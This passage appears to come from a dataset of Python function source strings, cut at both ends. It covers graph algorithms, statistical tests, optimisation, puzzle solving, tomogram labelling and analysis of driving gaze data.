]\"\n break\n if not is_3_ring :\n r5 = [ head ] \n r5.append(c1)\n r5.append(c2)\n r5 += intersect( graph[head], graph[c1])\n r5 += intersect( graph[head], graph[c2])\n r5.sort()\n if not r5 in rings5:\n if DEBUG: print \" 5member ring!\",r5\n rings5.append(r5)\n break\n return rings5, rings6", "def heuristique_ACPM(self,draw=False):\n\n def getVertricesOfPath(edges):\n set_node = set()\n for e in edges:\n id1,id2 = self.getIdVerticesOfEdge(e)\n set_node.add(id1)\n set_node.add(id2)\n return set_node\n\n\n if draw:\n try:\n os.makedirs(self.dirname+\"/H_ACPM\")\n except:\n pass\n\n\n #Graphe de depart contenant tout les noeuds\n G = Graphe_Individu(self,self.wholeGraphDict)\n if draw:\n self.drawGraph(\"/H_ACPM/G0\",G.get_graphe().get_edges())\n\n\n nb_vertices = 1\n nb_tmp_vertices = 0\n i=0\n\n #Tant que le nombre de noeuds du graphe decroit, appliquer kruskal\n while nb_vertices > nb_tmp_vertices :\n g_acpm = G.get_MST()\n\n\n nb_vertices = len(G.get_dictSteinerNodes())\n set_Node = set(G.get_dictSteinerNodes().keys())\n dictSteinerNodez = self.eliminationFeuilles(g_acpm.get_edges(),set_Node)\n G = Graphe_Individu(self,dictSteinerNodez)\n nb_tmp_vertices = len(dictSteinerNodez)\n\n if draw:\n i+= 1\n self.drawGraph(\"/H_ACPM/G%d\"%i+\"_%d\"%g_acpm.get_total_weight(),g_acpm.get_edges())\n\n\n if draw:\n self.drawGraph(\"/H_ACPM/GFinal_%d\"%G.get_MST().get_total_weight(),G.get_MST().get_edges())\n\n for i in self.steinerNodes:\n if i not in dictSteinerNodez.keys():\n dictSteinerNodez[i] = 0\n\n # return Graphe_Individu(self,dictSteinerNodez)\n return dictSteinerNodez", "def test_kruskal_wallis(self):\r\n d_control = [75, 67, 70, 75, 65, 71, 67, 67, 76, 68]\r\n d_2_gluc = [57, 58, 60, 59, 62, 60, 60, 57, 59, 61]\r\n d_2_fruc = [58, 61, 56, 58, 57, 56, 61, 60, 57, 58]\r\n d_1_1 = [58, 59, 58, 61, 57, 56, 58, 57, 57, 59]\r\n d_2_sucr = [62, 66, 65, 63, 64, 62, 65, 65, 62, 67]\r\n data = [d_control, d_2_gluc, d_2_fruc, d_1_1, d_2_sucr]\r\n kw_stat, pval = kruskal_wallis(data)\r\n self.assertFloatEqual(kw_stat, 38.436807439)\r\n self.assertFloatEqual(pval, 9.105424085598766e-08)\r\n # test using a random data set against scipy\r\n x_0 = array([0, 0, 0, 31, 12, 0, 25, 26, 775, 13])\r\n x_1 = array([14, 15, 0, 15, 12, 13])\r\n x_2 = array([0, 0, 0, 55, 92, 11, 11, 11, 555])\r\n # kruskal(x_0, x_1, x_2) = (0.10761259465923653, 0.94761564440615031)\r\n exp = (0.10761259465923653, 0.94761564440615031)\r\n obs = kruskal_wallis([x_0, x_1, x_2])\r\n self.assertFloatEqual(obs, exp)", "def auxmin_cc_piece(x,k_ind,m_ind):\n \n # Adding new linear function as a last function:\n # The first line. 
If jk = 1 and k_ind = nomax, this is a new line, otherwise an old one.\n line_start=cfg.nfea*sum(cfg.jk[i] for i in range(k_ind))\n #print line_start,cfg.jk,k_ind,cfg.nomax-1,cfg.jk[k_ind], cfg.xprev,x\n if cfg.jk[k_ind]==1 and k_ind==cfg.nomax-1:\n #print \"hihu0\"\n f_cc=np.dot(x[0:cfg.nfea-1],cfg.a[m_ind,:cfg.nfea-1])+x[cfg.nfea-1]\n cfg.min_line[k_ind,m_ind] = 0 # a global variable to save the smallest value.\n return f_cc\n else:\n #print \"hihu1\",line_start,k_ind\n f_cc=np.dot(cfg.xprev[line_start:line_start+(cfg.nfea-1)],cfg.a[m_ind,:cfg.nfea-1])+cfg.xprev[line_start+cfg.nfea-1]\n cfg.min_line[k_ind,m_ind] = 0 # a global variable to save the smallest value.\n if cfg.jk[k_ind]==1:\n return f_cc\n \n # Next lines\n line_start += cfg.nfea\n for j in range(1,cfg.jk[k_ind]-1): # Everything but the first and last.\n f_tmp = np.dot(cfg.xprev[line_start:line_start+(cfg.nfea-1)],cfg.a[m_ind,:cfg.nfea-1])+cfg.xprev[line_start+cfg.nfea-1]\n \n # Minimum of lines\n if f_tmp <= f_cc:\n f_cc = f_tmp\n cfg.min_line[k_ind,m_ind] = j\n line_start += cfg.nfea\n \n # The last line.\n if k_ind==cfg.nomax-1:\n #print \"hihu3\"\n f_tmp = np.dot(x[0:cfg.nfea-1],cfg.a[m_ind,:cfg.nfea-1])+x[cfg.nfea-1]\n else: \n \n f_tmp = np.dot(cfg.xprev[line_start:line_start+(cfg.nfea-1)],cfg.a[m_ind,:cfg.nfea-1])+cfg.xprev[line_start+cfg.nfea-1]\n \n # Minimum of lines\n if f_tmp <= f_cc:\n f_cc = f_tmp\n cfg.min_line[k_ind,m_ind] = cfg.jk[k_ind]-1 \n\n return f_cc", "def MCS(n,k):\n\tglobal dict_all\n\tdict_val=copy.deepcopy(dict_all)\n\t#start_time = time.time()\n\tfinal = {}\t\t\t\t\t # Store all results with the count as key. For example final[1]=[[1,0,0],[0,1,1]]\n\tseq = []\t\t\t\t\t\t# Store the count with no duplication\n\tfor i in range(n):\n\t\tleaf={}\t\t\t\t\t\t# leaf is the dictionary to store the random value of each leaf\n\t\t#count=0\n\t\tfor i in leaves:\n\t\t\tleaf[i] = choice([0,1])\n\t\t\tdict_val[i]=leaf[i]\n\t\t\t#count += leaf[i]\n\t\tresult = Cal_FT(dict_val)\t\n\t\t'''\n\t\tif result:\n\t\t\tcutset = []\n\t\t\tfor i in leaves:\n\t\t\t\tcutset.append(str(leaf[i]))\n\t\t\tcutset=\"\".join(cutset)\n\t\t\tif cutset not in final:\n\t\t\t\tfinal[cutset]=count\n\tfinal_sorted=sorted(zip(final.values(),final.keys())) \t\t\t\t#Order the cutsets by their counts\n\tfor i in range(k):\t\t\t\t\t\t\t\t\t\t\t\t\t#Print the first k results\n\t\tcutset=list(final_sorted[i][1])\n\t\tresult=[]\n\t\tfor index in range(len(cutset)):\n\t\t\tif cutset[index] == \"1\":\n\t\t\t\tresult.append(leaves[index])\n\t\tprint result\n\t#end_time=time.time()\n\t#print \"Running time is\", end_time-start_time\n\t'''", "def naive_consensus_search(Ts, m):\n k = len(Ts)\n\n bsf_radius = np.inf\n bsf_Ts_idx = 0\n bsf_subseq_idx = 0\n\n for j in range(k):\n radii = np.zeros(len(Ts[j]) - m + 1)\n for i in range(k):\n if i != j:\n mp = naive.stump(Ts[j], m, Ts[i])\n radii = np.maximum(radii, mp[:, 0])\n min_radius_idx = np.argmin(radii)\n min_radius = radii[min_radius_idx]\n if min_radius < bsf_radius:\n bsf_radius = min_radius\n bsf_Ts_idx = j\n bsf_subseq_idx = min_radius_idx\n\n return bsf_radius, bsf_Ts_idx, bsf_subseq_idx", "def search(self) -> int:\n # create node list\n for x in range(self.n):\n for y in range(self.n):\n if not self.grid[y][x] == 0:\n self.all_nodes.append((x, y))\n # recursively create paths\n i = 0\n paths = [[(0, 0)]]\n while i < self.n * self.n:\n paths = self.generate_paths(paths)\n if isinstance(paths, int):\n return paths\n i += 1\n\n return -1", "def challenge2(self):\n # Let's try an octree-type approach\n # 
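Recursively subdivide the space, keeping only cubes that could still beat the best count so far. 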
For each grid cube we should be able to find whether a nanobot:\n # 1) is not in range (is outside grid cube and not in range of nearest face)\n # 2) is in range of whole cube (all 8 corners are in range)\n # 3) is in range of part of the cube (i.e. not 1 or 2)\n # Root node: figure out extent of whole space\n mins = []\n maxs = []\n for axis in range(3):\n mins.append(min(self.nanobots, key=lambda n: n.coord[axis]).coord[axis])\n maxs.append(max(self.nanobots, key=lambda n: n.coord[axis]).coord[axis])\n\n for count in range(len(self.nanobots), 0, -1):\n results = self.search_coord_with_max_nanobots(mins, maxs, [], self.nanobots, count)\n if results and results[0].count >= count:\n break\n\n print(f\"Found {len(results)} octree search results with {results[0].count} nanobots in range.\")\n\n # Find result coord closest to origin\n closest_dist = np.iinfo(np.int32).max\n best_coord = None\n for result in results:\n for corner in itertools.product(*zip(result.mins, result.maxs)):\n d = manhattan_dist(corner, (0, 0, 0))\n if d < closest_dist:\n closest_dist = d\n best_coord = corner\n\n print(f\"Best coord: {best_coord} (dist={manhattan_dist(best_coord, (0, 0, 0))})\")", "def spatial_planner():\n from scipy.spatial import KDTree\n # KDTree", "def eg_sk():\n\n rxs = []\n a = []\n b = []\n c = []\n d = []\n e = []\n f = []\n g = []\n h = []\n i = []\n j = []\n\n for _ in range(1000):\n a.append(utils.gaussian(10, 1))\n\n for _ in range(1000):\n b.append(utils.gaussian(10.1, 1))\n\n for _ in range(1000):\n c.append(utils.gaussian(20, 1))\n\n for _ in range(1000):\n d.append(utils.gaussian(30, 1))\n\n for _ in range(1000):\n e.append(utils.gaussian(30.1, 1))\n\n for _ in range(1000):\n f.append(utils.gaussian(10, 1))\n\n for _ in range(1000):\n g.append(utils.gaussian(10, 1))\n\n for _ in range(1000):\n h.append(utils.gaussian(40, 1))\n\n for _ in range(1000):\n i.append(utils.gaussian(40, 3))\n\n for _ in range(1000):\n j.append(utils.gaussian(10, 1))\n\n for k, v in enumerate([a, b, c, d, e, f, g, h, i, j]):\n rxs.append(creation.RX(v, \"rx{}\".format(k)))\n\n for rx in stats.tiles(stats.scottKnot(rxs)):\n print(\"\", rx[\"rank\"], rx[\"name\"], rx[\"show\"], sep=\"\\t\")", "def min_span_tree(adjacency_matrix, indices_to_connect):\n\n if len(indices_to_connect) > 1:\n Root = indices_to_connect[0]\n M = Prim(adjacency_matrix, Root)\n adjacency_matrix, W, Path, Degree, TreeNbr = M.mst_prim(adjacency_matrix,\n [Root], [], M.degree, M.tree_nbr)\n\n return W, Path, Degree, TreeNbr", "def partition(data, s, b, u, res, points, size, depth):\r\n\t# depth is just for demonstration purposes, terminating the recursion early\r\n\t\r\n\t# termination conditions\r\n\tif size > 1 and depth > 0:\r\n\r\n\t\t# variables that keep track of the scope of \"points\" for iteration purposes\r\n\t\trlen = []\r\n\t\tclen = len(points)\r\n\t\tfor i in range(clen):\r\n\t\t\trlen.append(len(points[i]))\r\n\t\t\r\n\t\t# keeps track of which point defines the maximal set\r\n\t\tmax = -10000\r\n\t\tmax_index = [0,0]\r\n\r\n\t\t# each point on the grid defines a potentially maximal set (including that point and the best \r\n\t\t# choice for higher rows) s[x][y] tracks the value of the set defined by (x, y)\r\n\t\tfor i in range(len(points)):\r\n\t\t\t# calculating s based on current row\r\n\t\t\ts[points[i][rlen[i]-1][0]][points[i][rlen[i]-1][1]] = data[points[i][rlen[i]-1][0]][points[i][rlen[i]-1][1]]\r\n\t\t\tfor j in range(rlen[i] - 2, -1, -1):\r\n\t\t\t\ts[points[i][j][0]][points[i][j][1]] = s[points[i][j + 
1][0]][points[i][j + 1][1]] + data[points[i][j][0]][points[i][j][1]]\r\n\t\t\t\r\n\t\t\t# if below the first row, factoring in the optimal set from above rows\r\n\t\t\tif i != 0:\r\n\t\t\t\tprev_end = points[i-1][rlen[i-1]-1]\r\n\t\t\t\tfor j in range(rlen[i]):\r\n\t\t\t\t\tu[points[i][j][0]][points[i][j][1]] = b[prev_end[0]][np.minimum(prev_end[1], points[i][j][1])]\r\n\t\t\t\t\ts[points[i][j][0]][points[i][j][1]] += s[prev_end[0]][u[points[i][j][0]][points[i][j][1]]]\r\n\t\t\t\r\n\t\t\t# keeping track of the best sets from the new row for later use (what b and u are for)\r\n\t\t\trow_max = -10000\r\n\t\t\trow_max_index = -1\r\n\t\t\tfor j in range(rlen[i]):\r\n\t\t\t\tcurr = s[points[i][j][0]][points[i][j][1]]\r\n\t\t\t\tif curr > row_max:\r\n\t\t\t\t\trow_max = curr\r\n\t\t\t\t\trow_max_index = points[i][j][1]\r\n\t\t\t\tb[points[i][j][0]][points[i][j][1]] = row_max_index\r\n\r\n\t\t\t# updating the global optimal set\r\n\t\t\tif row_max > max:\r\n\t\t\t\tmax = row_max\r\n\t\t\t\tmax_index[0] = i\r\n\t\t\t\tmax_index[1] = row_max_index\r\n\t\t\r\n\t\t# finding the set of points that generated the global optimum\r\n\t\tpointers = []\r\n\t\tpointers.append(max_index[1])\r\n\t\tfor i in range(max_index[0], 0, -1):\r\n\t\t\tpointers.append(u[points[i][0][0]][pointers[max_index[0]-i]])\r\n\t\tpointers = np.flip(pointers, axis=0)\r\n\t\t\r\n\t\t# finding the set of points of the upper and lower partitions defined by the optimal set\r\n\t\tupper_points = []\r\n\t\tlower_points = []\r\n\t\tup_num = 0\r\n\t\tlow_num = 0\r\n\t\tfor i in range(clen):\r\n\t\t\turow = []\r\n\t\t\tlrow = []\r\n\t\t\tfor j in range(rlen[i]):\r\n\t\t\t\tif i <= max_index[0] and points[i][j][1] >= pointers[i]:\r\n\t\t\t\t\turow.append(points[i][j])\r\n\t\t\t\t\tup_num += 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tlrow.append(points[i][j])\r\n\t\t\t\t\tlow_num += 1\r\n\t\t\tif len(urow) > 0:\r\n\t\t\t\tupper_points.append(tuple(urow))\r\n\t\t\tif len(lrow) > 0:\r\n\t\t\t\tlower_points.append(tuple(lrow))\r\n\r\n\t\t# updating the final result and prepping the new datasets to have mean 0\r\n\t\tfor i in range(len(upper_points)):\r\n\t\t\tfor j in range(len(upper_points[i])):\r\n\t\t\t\tres[upper_points[i][j][0]][upper_points[i][j][1]] += max/up_num\r\n\t\t\t\tdata[upper_points[i][j][0]][upper_points[i][j][1]] -= max/up_num\r\n\t\tfor i in range(len(lower_points)):\r\n\t\t\tfor j in range(len(lower_points[i])):\r\n\t\t\t\tres[lower_points[i][j][0]][lower_points[i][j][1]] -= max/low_num\r\n\t\t\t\tdata[lower_points[i][j][0]][lower_points[i][j][1]] += max/low_num\r\n\t\t\r\n\t\t# recursion (if the optimal set is the current one, stop since at this point \r\n\t\t# the mean of the selected elements is optimal over them)\r\n\t\tif up_num != size:\r\n\t\t\tpartition(data, s, b, u, res, upper_points, up_num, depth-1)\r\n\t\tif low_num != size:\r\n\t\t\tpartition(data, s, b, u, res, lower_points, low_num, depth-1)\r\n\telse:\r\n\t\treturn", "def _single_pass_optimize(self, best_centre_inds, best_score, min_to_cluster, nbrs):\n def score_inds(vals):\n inds, ind = vals\n other_best_inds.append(ind)\n score = np.sum(np.min(self.orig_dists[np.ix_(inds,other_best_inds)], axis=1))\n other_best_inds.pop()\n return (score, ind)\n #dists = self.orig_dists.copy() If I zero out rows I don't need, I don't have to use ix_() which is 2x as fast. 
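Zeroing out the unused rows would avoid the np.ix_ fancy indexing inside score_inds. 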
Probably doesn't matter, fast enough.\n best_centre_inds = best_centre_inds[::]\n inds_to_try = list(nbrs)\n for i in range(len(best_centre_inds)):\n other_best_inds = best_centre_inds[:i] + best_centre_inds[i+1:]\n cur_covered_set = set().union(*(nbrs[ind] for ind in other_best_inds))\n cvrd_inds = [list(cur_covered_set | nbrs[ind]) for ind in inds_to_try]\n valid_cvrd_inds = [(inds, ind) for inds, ind in zip(cvrd_inds, inds_to_try) if len(inds) >= min_to_cluster]\n score_vals = map(score_inds, valid_cvrd_inds)\n best_score, best_ind = min(score_vals)\n best_centre_inds[i] = best_ind\n return best_centre_inds", "def main(datafilepath):\n #create midline\n sectionsize = 10000\n TrackData = TrackMaker(sectionsize) # 10000\n moving_window = sectionsize*2\n midline = TrackData[0] \n sections = TrackData[2]\n #midline = midline[sections[0]:sections[5],:] #only work with the midline of the trial \n #steergaze_df = pd.read_feather(datafilepath)\n steergaze_df = pd.read_csv(datafilepath, sep=',',header=0)\n #steergaze_df.reset_index()\n master_steergaze = pd.DataFrame()\n datafolder = os.path.split(datafilepath)[0] \n\n #TODO: due to grouping the future path cuts off at the end of the slalom, use the continuous trajectory across roadsections for fp mapping\n\n #modes taken from gaze_through_midline_densities.py\n entry = find_closest_index(midline, [-23, 69])\n firstobject = find_closest_index(midline, [25, 52])\n gazemodes = [entry, firstobject]\n\n mid_diff = np.linalg.norm(np.diff(midline, axis=0, prepend = np.array([[0,0]])), axis = 1)\n midline_dist_array = np.cumsum(mid_diff)\n\n tree = spatial.cKDTree(midline)\n\n #for trial in picked_trials:\t\n for block, blockdata in steergaze_df.groupby(['ID','block']):\n\n print(block)\n begin = timer()\n\n\n blockdata = blockdata.copy()\n blockdata.sort_values('currtime', inplace=True)\n # blockdata.reset_index()\n\n ####pick target\n \"\"\"\n condition = blockdata.condition.values[0]\n target_centres = targets.loc[targets['condition']==int(condition),:]\n #pprint(target_centres)\n\n target_centres = target_centres.reset_index(drop=True)\n #pick starting position.\n start_x = np.sign(blockdata['posx']).values[0]\n #select targets with opposite sign for xcentre, these will be the ones encountered in that block\n target_centres = target_centres.loc[np.sign(target_centres['xcentre'])!=start_x,:] \n target_circles = dp.target_position_circles(target_centres)\n\n \"\"\"\n\n traj_x = blockdata['posx'].values\n traj_z = blockdata['posz'].values\n trajectory = np.transpose(np.array([traj_x, traj_z]))\n\n yaw = blockdata['yaw'].values\n \n #gaze_on_screen = blockdata['hangle'].values, blockdata['vangle'].values\n gaze_on_screen = np.transpose(np.array([blockdata['hangle'].values, blockdata['vangle'].values]))\n\n #print(yaw[0])\n #index = i\n #\tviewpoint = blockdata['posx'].values, blockdata['posz'].values\n roadsection = blockdata['roadsection'].values\n\n #find time headway along MIDLINE \n \"\"\"\n start = timer()\n #idx, *_ = find_closest_index(midline, trajectory[0,:])\n idx = [find_closest_index(midline, viewpoint) for viewpoint in trajectory] \n print(idx[:10])\n print(timer()-start)\n \"\"\"\n\n #closest_indexes = [closest_node(midline, viewpoint) for viewpoint in trajectory] \n #closest indexes\n #print(np.take(midline, 5, axis = 0, mode = 'wrap'))\n #print(np.take(midline, len(midline), axis = 0, mode = 'wrap'))\n #print(np.take(midline, 0, axis = 0, mode = 'wrap'))\n _, closest_indexes = tree.query(trajectory) \n\n end_of_view = closest_indexes + 
moving_window\n\n #futuremid = np.take(midline, range(closest_indexes[0], end_of_view[0]), axis = 0, mode = 'wrap')\n def takemid(c,e):\n return (np.take(midline, range(c, e), axis = 0, mode = 'wrap'))\n\n start = timer()\n ml_idx, ml_screen_refs, ml_world_refs, ml_th = zip(*[\n closest_on_screen_point(takemid(c,e), t, y, g) \n for c, e, t, y, g in zip(closest_indexes, end_of_view, trajectory, yaw, gaze_on_screen)\n ])\n print(timer() - start) \n \n print(np.shape(ml_screen_refs))\n print(type(ml_screen_refs))\n ml_screen_refs = np.array(ml_screen_refs).reshape(-1, 2)\n ml_world_refs = np.array(ml_world_refs).reshape(-1, 2)\n print(ml_th)\n\n blockdata['midline_ref_onscreen_x'] = ml_screen_refs[:, 0]\n blockdata['midline_ref_onscreen_z'] = ml_screen_refs[:, 1]\n blockdata['midline_ref_world_x'] = ml_world_refs[:, 0]\n blockdata['midline_ref_world_z'] = ml_world_refs[:, 1]\n blockdata['th_along_midline'] = ml_th\n\n #find closest point on FUTURE PATH, with th calc along the path \n \n traj_index = range(len(trajectory))\n fp_idx, fp_screen_refs, fp_world_refs, fp_th = zip(*[\n closest_on_screen_point(trajectory[i:(i+1000),:], t, y, g) \n for i, t, y, g in zip(traj_index, trajectory, yaw, gaze_on_screen)\n ])\n #future_traj = trajectory[index:(index+window_fp), :]\n #fp_world_ref, fp_idx, dists, fp_angles = closest_on_screen_point(future_traj, viewpoint, yaw, gaze_on_screen)\n print(np.shape(fp_screen_refs))\n print(type(fp_screen_refs))\n fp_screen_refs = np.array(fp_screen_refs).reshape(-1, 2)\n fp_world_refs = np.array(fp_world_refs).reshape(-1, 2)\n print(fp_th)\n\n blockdata['futurepath_ref_onscreen_x'] = fp_screen_refs[:, 0]\n blockdata['futurepath_ref_onscreen_z'] = fp_screen_refs[:, 1]\n blockdata['futurepath_ref_world_x'] = fp_world_refs[:, 0]\n blockdata['futurepath_ref_world_z'] = fp_world_refs[:, 1]\n blockdata['th_along_futurepath'] = fp_th\n \n \n\n #TODO: current method runs into problems if the viewpoint is just before the midline resets (i.e. 
very large midline_dist_array value).\n #but not a problem for current analysis because trial starts from beginning of midline.\n #th_to_entry\n mid_dist_viewpoint = midline_dist_array[closest_indexes]\n\n mid_dist_entry = midline_dist_array[gazemodes[0]]\n th_to_entry = (mid_dist_entry - mid_dist_viewpoint) / 8.0 #if it's negative you have passed the point\n blockdata['veh_th_to_entry'] = th_to_entry\n\n #th_to_object\n mid_dist_object = midline_dist_array[gazemodes[1]]\n th_to_object = (mid_dist_object - mid_dist_viewpoint) / 8.0 #if it's negative you have passed the point\n blockdata['veh_th_to_object'] = th_to_object\t\t\n \n \"\"\"\n trialcode = row['trialcode']\n #plot\t\t\t \n #print(\"th_along_midline\", ml_timeheadway)\n #print('ml_ref', ml_world_ref)\n #print(\"th_along_futurepath\", fp_timeheadway)\n #print(\"fp_ref\", fp_world_ref)\n\n world_gaze = dp.angles_to_world(gaze_on_screen, viewpoint, yaw)\n #print(\"world_gaze\", world_gaze)\n\n plt.ylim(angles_limits_bottom[1],angles_limits_top[1])\n plt.xlim(angles_limits_bottom[0],angles_limits_top[0])\n\n plt.plot(ml_angles[:,0],ml_angles[:,1], 'C3o', markersize = .5, )\n plt.plot(fp_angles[:,0],fp_angles[:,1], 'C2o', markersize = .5)\n plt.plot(ml_screen_ref[0],ml_screen_ref[1], 'C1o', markersize = 5, markeredgecolor = 'k')\n plt.plot(fp_screen_ref[0],fp_screen_ref[1], 'C0o', markersize = 5, markeredgecolor = 'k')\n\n plt.plot(gaze_on_screen[0],gaze_on_screen[1], 'mo', markersize = 5, markeredgecolor = 'k')\n plt.title(str(trialcode))\n\n\n plt.pause(.016) \n plt.cla()\n\n plt.show()\n \"\"\"\n\t\t\n #master_steergaze = pd.concat([master_steergaze, blockdata])\n\n\n compute_time = timer()-begin\n print(\"Processing block took %f seconds\" % compute_time)\n\n\n print(\"APPENDING DATA FRAME\")\n outfilepath = datafolder + '/trout_gazeandsteering_addthfrompath2.csv'\n\n with open(outfilepath, 'a', newline = '') as sgfile:\n blockdata.to_csv(sgfile, mode='a', header=sgfile.tell()==0)\n\n #master_steergaze.to_csv(datafolder + '/trout_gazeandsteering_addthfrompath.csv')\n\n #master_steergaze.to_feather(datafilepath)", "def _SD_optimal(t):", "def calculate_first_order_correction(self,cutoff_matrix_element,L0,**kwargs):\r\n n = kwargs['ket_index']\r\n m = kwargs['bra_index']\r\n if n >= m: return 0.0\r\n evecs = self.evecs\r\n evals = self.evals\r\n # ignore drive terms whose matrix elements are beneath a specified cutoff for speed-up. 
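Such terms make a negligible contribution to the first-order correction, so the function returns 0.0 for them. 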
\r\n v_nm = (evecs[n].dag()*(self.v*evecs[m]))[0][0][0]\r\n if abs(v_nm) <= cutoff_matrix_element: return 0.0\r\n \r\n k = self.integer_list\r\n rho_s_vectorform = np.reshape(self.density_matrix,(self.dim**2,1),order='F')\r\n\r\n V_nm = (evecs[n]*evecs[m].dag()*(evecs[n].dag()*(self.v*evecs[m])))\r\n L_nm = qt.liouvillian(V_nm)\r\n #b = np.dot(L_nm.full(),rho_0)\r\n b = (L_nm*rho_s_vectorform).data\r\n omega_of_k = (k[n] - k[m] + 1)*self.omega\r\n \r\n A = 1j*omega_of_k * qt.identity(self.dim**2).data - L0.data\r\n \r\n #A = A.full()\r\n #del_rho = la.lstsq(A,b,rcond = 1e-6)[0]\r\n \r\n if omega_of_k == 0:\r\n del_rho = la.lsmr(A,b)[0]\r\n else:\r\n del_rho = spsolve(A,b)\r\n \r\n return nla.norm(del_rho)", "def solver(graph,homes,source,home_clusters,all_pairs_distances,all_pairs_shortest_paths):\n\n car_path = [get_car_path(graph,home_clusters,source,all_pairs_distances,all_pairs_shortest_paths, \n source_in_clusters = B1, christofides = B2) for B1 in [False,True] for B2 in [False,True]]\n\n dropoffs = [cluster_solver_utils.nearest_dropoff_efficient(graph,path,homes,all_pairs_distances) for path in car_path]\n cost = [cluster_solver_utils.eval_cost_efficient(graph,car_path[i],dropoffs[i],all_pairs_distances) for i in range(len(car_path))]\n\n minimum_cost = min(cost)\n idx = cost.index(minimum_cost)\n\n return minimum_cost, dropoffs[idx], car_path[idx]", "def getOmegaMVEst(Sn):\n\n sols = defaultdict(lambda: defaultdict(int))\n\n for a, b, c in tripletGenerator(Sn):\n if a is b or a is c or b is c: continue\n if isSolvableVect(a, b, c):\n d = solveVect(a, b, c)\n dtuple = tuple(d[:-1])\n dclass = d[-1]\n sols[dtuple][dclass] += 1\n\n nOK = nKO = 0\n for x in Sn:\n xtuple = tuple(x[:-1])\n xclass = x[-1]\n if xtuple not in sols: continue\n maj_class = max(sols[xtuple].keys(), key=lambda k: sols[xtuple][k])\n\n if maj_class == xclass:\n nOK += 1\n else:\n nKO += 1\n\n try:\n estW = nOK / (nOK + nKO)\n except ZeroDivisionError:\n estW = 0\n\n return estW", "def main():\n\n cages = [\n \"AABCCD\",\n \"EFBCGD\",\n \"EFFHGI\",\n \"EJJHGI\",\n \"EKJHGL\",\n \"KKJLLL\",\n ]\n\n peaks = [\n (0, 1),\n (0, 2),\n (1, 3),\n (1, 4),\n (1, 5),\n (2, 1),\n (2, 3),\n (3, 0),\n (3, 5),\n (4, 2),\n (5, 1),\n (5, 4),\n ]\n\n extract = {\n \"A\": (5, 2),\n \"B\": (0, 3),\n \"C\": (3, 2),\n \"D\": (1, 4),\n \"E\": (0, 1),\n \"F\": (1, 5),\n \"G\": (4, 2),\n \"H\": (3, 5),\n \"I\": (1, 0),\n \"J\": (5, 5),\n \"K\": (3, 4),\n \"L\": (5, 1),\n \"M\": (0, 5),\n \"N\": (4, 4),\n }\n\n def answer(sg):\n solved_grid = sg.solved_grid()\n s = \"\"\n s += chr(64 + solved_grid[extract[\"A\"]] + solved_grid[extract[\"B\"]])\n s += chr(64 + solved_grid[extract[\"C\"]] + solved_grid[extract[\"D\"]])\n s += chr(64 + solved_grid[extract[\"E\"]] + solved_grid[extract[\"F\"]] + solved_grid[extract[\"G\"]])\n s += chr(64 + solved_grid[extract[\"H\"]] + solved_grid[extract[\"I\"]])\n s += chr(64 + solved_grid[extract[\"J\"]] + solved_grid[extract[\"K\"]] + solved_grid[extract[\"L\"]])\n s += chr(64 + solved_grid[extract[\"M\"]] + solved_grid[extract[\"N\"]])\n return s\n\n sym = grilops.make_number_range_symbol_set(1, 6)\n lattice = grilops.get_square_lattice(6)\n sg = grilops.SymbolGrid(lattice, sym)\n\n add_sudoku_constraints(sg)\n\n # Constrain regions to match the cages and be rooted at the peaks.\n cage_label_to_region_id = {}\n for py, px in peaks:\n cage_label_to_region_id[cages[py][px]] = lattice.point_to_index((py, px))\n\n rc = grilops.regions.RegionConstrainer(lattice, sg.solver)\n for y, x in lattice.points:\n 
sg.solver.add(\n rc.region_id_grid[(y, x)] == cage_label_to_region_id[cages[y][x]])\n\n # Within each region, a parent cell must have a greater value than a child\n # cell, so that the values increase as you approach the root cell (the peak).\n for p in lattice.points:\n for n in sg.edge_sharing_neighbors(p):\n sg.solver.add(Implies(\n rc.edge_sharing_direction_to_index(n.direction) == rc.parent_grid[p],\n n.symbol > sg.grid[p]\n ))\n\n if sg.solve():\n sg.print()\n print()\n print(answer(sg))\n while not sg.is_unique():\n print()\n print(\"Alternate solution\")\n sg.print()\n print()\n print(answer(sg))\n else:\n print(\"No solution\")", "def global_analysis(tomo, b_th, c=18):\n\n ## Thresholding and Volume analysis\n if c == 6:\n con_mat = [ [[0, 0, 0], [0, 1, 0], [0, 0, 0]],\n [[0, 1, 0], [1, 1, 1], [0, 1, 0]],\n [[0, 0, 0], [0, 1, 0], [0, 0, 0]] ]\n elif c == 18:\n con_mat = [[[0, 1, 0], [1, 1, 1], [0, 1, 0]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[0, 1, 0], [1, 1, 1], [0, 1, 0]]]\n elif c == 26:\n con_mat = [[[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]]]\n else:\n raise ValueError\n tomo_lbl, num_lbls = sp.ndimage.label(tomo >= b_th, structure=np.ones(shape=[3, 3, 3]))\n tomo_out = np.zeros(shape=tomo.shape, dtype=int)\n lut = np.zeros(shape=num_lbls+1, dtype=int)\n\n ## COUNTING REGIONS METHODS\n # import time\n # hold_t = time.time()\n # for lbl in range(1, num_lbls + 1):\n # ids = tomo == lbl\n # feat_sz = len(ids)\n # tomo_out[ids] = feat_sz\n # # print('[1]:', lbl, 'of', num_lbls)\n # print time.time() - hold_t\n\n ## COUNTING PIXELS METHOD\n ## Count loop\n # cont, total = 0, np.prod(tomo.shape)\n # import time\n # hold_t = time.time()\n for x in range(tomo.shape[0]):\n for y in range(tomo.shape[1]):\n for z in range(tomo.shape[2]):\n id = tomo_lbl[x, y, z]\n lut[id] += 1\n # cont += 1\n # print('[1]:', cont, 'of', total)\n #\n ## Write loop\n # cont, total = 0, np.prod(tomo.shape)\n\n for x in range(tomo.shape[0]):\n for y in range(tomo.shape[1]):\n for z in range(tomo.shape[2]):\n id = tomo_lbl[x, y, z]\n if id > 0:\n tomo_out[x, y, z] = lut[id]\n # cont += 1\n # print('[1]:', cont, 'of', total)\n # print time.time() - hold_t\n\n return tomo_out", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. 
